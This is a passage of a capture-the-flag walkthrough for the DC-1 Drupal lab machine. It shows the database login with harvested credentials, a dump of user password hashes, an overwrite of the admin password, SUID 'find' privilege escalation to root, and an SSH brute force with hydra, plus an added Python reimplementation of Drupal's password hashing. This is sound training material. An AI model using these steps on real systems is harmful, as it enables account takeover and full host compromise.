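    # A commented example line (" *   $drupal_hash_salt = file_get_contents(...)") does not
    # match SALT_FILE_RE because the line starts with '*', not with '$'.
    if SALT_INLINE_RE.search(text) and not SALT_FILE_RE.search(text):
        findings.append(("low", "$drupal_hash_salt stored inline; keep it in a file outside the docroot"))
    if mode is not None:
        if mode & stat.S_IWGRP or mode & stat.S_IWOTH:
            findings.append(("high", "settings.php is group/world writable"))
        if mode & stat.S_IROTH:
            findings.append(("medium", "settings.php is world readable; 440 root:%s is enough" % web_user))
    if owner == web_user:
        findings.append(("medium", "settings.php is owned by the web server user '%s'" % web_user))
    return findings


if __name__ == "__main__":
    # Assumed stat() results for the DC-1 file: mode 0644, owned by www-data.
    for severity, msg in audit_settings(DC1_SETTINGS, mode=0o100644, owner="www-data"):
        print("[%s] %s" % (severity, msg))
```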

Database

www-data@DC-1:/var/www$ mysql -udbuser -pR0ck3t
mysql -udbuser -pR0ck3t
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 97
Server version: 5.5.60-0+deb7u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use drupaldb;show tables;
use drupaldb;show tables;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
+-----------------------------+
| Tables_in_drupaldb          |
+-----------------------------+
| actions                     |
| authmap                     |
| batch                       |
| block                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache                       |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_update                |
| cache_views                 |
| cache_views_data            |
| comment                     |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_comment_body     |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_comment_body |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter                      |
| filter_format               |
| flood                       |
| history                     |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_comment_statistics     |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role                        |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| system                      |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
+-----------------------------+
80 rows in set (0.00 sec)

mysql> select * from users;
select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name  | pass                                                    | mail              | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init              | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
|   0 |       |                                                         |                   |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                   | NULL |
|   1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com |       |           | NULL             | 1550581826 | 1550583852 | 1550582362 |      1 | Australia/Melbourne |          |       0 | admin@example.com | b:0; |
|   2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org  |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | fred@example.org  | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+

Method found via a search engine

https://drupalchina.cn/node/2128

Submitted by [东方龙马](https://drupalchina.cn/users/dong-fang-long-ma "View user profile.") on 29 October 2013

Q: I forgot the Drupal 7 password, how do I solve this?

A: **Method one**: register a new user whose password you know, then use a visual MySQL management tool such as phpMyAdmin to copy that user's encrypted password in the users table into admin's password field.

**Method two**: this is the most native method Drupal provides. On Windows, open the command-line client (cmd), change to the directory of the Drupal 7 project, and type the following command:

php scripts/password-hash.sh admin

Output:

password: admin                 hash: $S$DMtruNEVmqWoqhlPwTlnFzwyBRFgQwXUfppe9pW1RqqXlMy97tzA

Then in the database, look in the users table, find the corresponding username, modify the password by copying the hash value above into the password field, and save.
www-data@DC-1:/var/www$ find -name 'password-hash.sh'
find -name 'password-hash.sh'
./scripts/password-hash.sh
# Take a look at how it is used
www-data@DC-1:/var/www$ cat ./scripts/password-hash.sh
cat ./scripts/password-hash.sh
#!/usr/bin/php
<?php

/**
 * Drupal hash script - to generate a hash from a plaintext password
 *
 * Check for your PHP interpreter - on Windows you'll probably have to
 * replace line 1 with
 *   #!c:/program files/php/php.exe
 *
 * @param password1 [password2 [password3 ...]]
 *  Plain-text passwords in quotes (or with spaces backslash escaped).
 */

if (version_compare(PHP_VERSION, "5.2.0", "<")) {
  $version  = PHP_VERSION;
  echo <<<EOF

ERROR: This script requires at least PHP version 5.2.0. You invoked it with
       PHP version {$version}.
\n
EOF;
  exit;
}

$script = basename(array_shift($_SERVER['argv']));

if (in_array('--help', $_SERVER['argv']) || empty($_SERVER['argv'])) {
  echo <<<EOF

Generate Drupal password hashes from the shell.

Usage:        {$script} [OPTIONS] "<plan-text password>"
Example:      {$script} "mynewpassword"

All arguments are long options.

  --help      Print this page.

  --root <path>

              Set the working directory for the script to the specified path.
              To execute this script this has to be the root directory of your
              Drupal installation, e.g. /home/www/foo/drupal (assuming Drupal
              running on Unix). Use surrounding quotation marks on Windows.

  "<password1>" ["<password2>" ["<password3>" ...]]

              One or more plan-text passwords enclosed by double quotes. The
              output hash may be manually entered into the {users}.pass field to
              change a password via SQL to a known value.

To run this script without the --root argument invoke it from the root directory
of your Drupal installation as

  ./scripts/{$script}
\n
EOF;
  exit;
}

$passwords = array();

// Parse invocation arguments.
while ($param = array_shift($_SERVER['argv'])) {
  switch ($param) {
    case '--root':
      // Change the working directory.
      $path = array_shift($_SERVER['argv']);
      if (is_dir($path)) {
        chdir($path);
      }
      break;

    default:
      // Add a password to the list to be processed.
      $passwords[] = $param;
      break;
  }
}

define('DRUPAL_ROOT', getcwd());

include_once DRUPAL_ROOT . '/includes/password.inc';
include_once DRUPAL_ROOT . '/includes/bootstrap.inc';

foreach ($passwords as $password) {
  print("\npassword: $password \t\thash: ". user_hash_password($password) ."\n");
}
print("\n");

Obtaining the password hash

www-data@DC-1:/var/www$ php ./scripts/password-hash.sh admin123
php ./scripts/password-hash.sh admin123

password: admin123 		hash: $S$DQzdwU7zlyiorCqNldghxrF2To6lgHhfnpZpr1SCIw8YBZN8PZFx

Updating the password in the database

mysql> update users set pass="$S$DQzdwU7zlyiorCqNldghxrF2To6lgHhfnpZpr1SCIw8YBZN8PZFx" where name= 'admin' or name = 'Fred';
Query OK, 2 rows affected (0.01 sec)
Rows matched: 2  Changed: 2  Warnings: 0

mysql> select * from users;
select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name  | pass                                                    | mail              | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init              | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
|   0 |       |                                                         |                   |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                   | NULL |
|   1 | admin | $S$DQzdwU7zlyiorCqNldghxrF2To6lgHhfnpZpr1SCIw8YBZN8PZFx | admin@example.com |       |           | NULL             | 1550581826 | 1550583852 | 1550582362 |      1 | Australia/Melbourne |          |       0 | admin@example.com | b:0; |
|   2 | Fred  | $S$DQzdwU7zlyiorCqNldghxrF2To6lgHhfnpZpr1SCIw8YBZN8PZFx | fred@example.org  |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | fred@example.org  | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
3 rows in set (0.00 sec)
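To see what password-hash.sh actually produces (and to verify a hash such as the one above before writing it into users.pass, or to test a dumped hash against a known password), here is an added Python reimplementation of Drupal 7's `$S$` scheme, iterated SHA-512 with a phpass-style salt encoding. It is not code from the write-up or from Drupal; the function names are my own, and `DC1_ADMIN123` is the hash the write-up shows for `admin123`.

```python
import hashlib
import hmac
import os

# Drupal 7 includes/password.inc: phpass alphabet, 55-char hash, cost 2^7..2^30
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55
MIN_LOG2, MAX_LOG2, DEFAULT_LOG2 = 7, 30, 15

def _b64(data: bytes) -> str:
    # phpass-style base64 (_password_base64_encode): 3 bytes -> 4 chars, LSB first
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def _crypt(password: str, setting: str):
    # _password_crypt('sha512'): first 12 chars ($S$ + cost + 8-char salt) are the setting
    setting = setting[:12]
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        return None
    log2 = ITOA64.find(setting[3])              # 'D' -> 15
    if not MIN_LOG2 <= log2 <= MAX_LOG2:
        return None
    pw = password.encode()
    h = hashlib.sha512(setting[4:].encode() + pw).digest()
    for _ in range(1 << log2):                  # 32768 more rounds at cost 'D'
        h = hashlib.sha512(h + pw).digest()
    return (setting + _b64(h))[:HASH_LENGTH]    # 86 chars computed, 55 stored

def hash_password(password: str, log2: int = DEFAULT_LOG2) -> str:
    # user_hash_password(): a random 6-byte salt encodes to the 8 salt chars
    return _crypt(password, "$S$" + ITOA64[log2] + _b64(os.urandom(6)))

def check_password(password: str, stored: str) -> bool:
    # user_check_password() for $S$ hashes (legacy U$S$ MD5 hashes not handled)
    computed = _crypt(password, stored)
    return computed is not None and hmac.compare_digest(computed, stored)

DC1_ADMIN123 = "$S$DQzdwU7zlyiorCqNldghxrF2To6lgHhfnpZpr1SCIw8YBZN8PZFx"  # admin123, from the write-up
```

`check_password("admin123", DC1_ADMIN123)` returns True; the cost character after `$S$` is what makes each guess cost 32769 SHA-512 calls, which is why dumping this table does not hand over passwords directly.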

Flag3

After logging in on the web side, click Dashboard in the upper left corner and flag3 is visible.

# flag3

## Primary tabs

- [View (active tab)](http://192.168.1.183/node/2)
- [Edit](http://192.168.1.183/node/2/edit)

# Hints at the Linux files passwd and shadow
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
www-data@DC-1:/var/www$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
# Log in as this user, or escalate directly to root
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash

Privilege escalation

www-data@DC-1:/var/www$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
# The classic SUID find privilege escalation
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
www-data@DC-1:/var/www$ find / -name index.php -exec "/bin/sh" \;
find / -name index.php -exec "/bin/sh" \;
# whoami
whoami
root

flag4's password can also be brute-forced

└─# hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.1.183
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-11 17:05:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.1.183:22/
[22][ssh] host: 192.168.1.183   login: flag4   password: orange
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-11 17:05:28

┌──(root㉿kali)-[~]
└─# ssh flag4@192.168.1.183
The authenticity of host '192.168.1.183 (192.168.1.183)' can't be established.
ECDSA key fingerprint is SHA256:89B+YqcNl4cSf/BZk26MQG1QeW4BvBlVENMbTRhVhsU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.183' (ECDSA) to the list of known hosts.
flag4@192.168.1.183's password: 
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
flag4@DC-1:~$ ls
flag4.txt
flag4@DC-1:~$ cat flag4.txt
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

Flag4

# cd /home/flag4
cd /home/flag4
# ls
ls
flag4.txt
# cat flag4.txt 
cat flag4.txt
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

Flag5

# cd /root
cd /root
# ls
ls
thefinalflag.txt
# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

Summary

Do thorough information gathering, then go deeper through a chain of steps: exploiting known historical vulnerabilities in the web application, reusing the database account credentials, resetting passwords, and so on.

SUID privilege escalation


http://www.ppmy.cn/server/167026.html
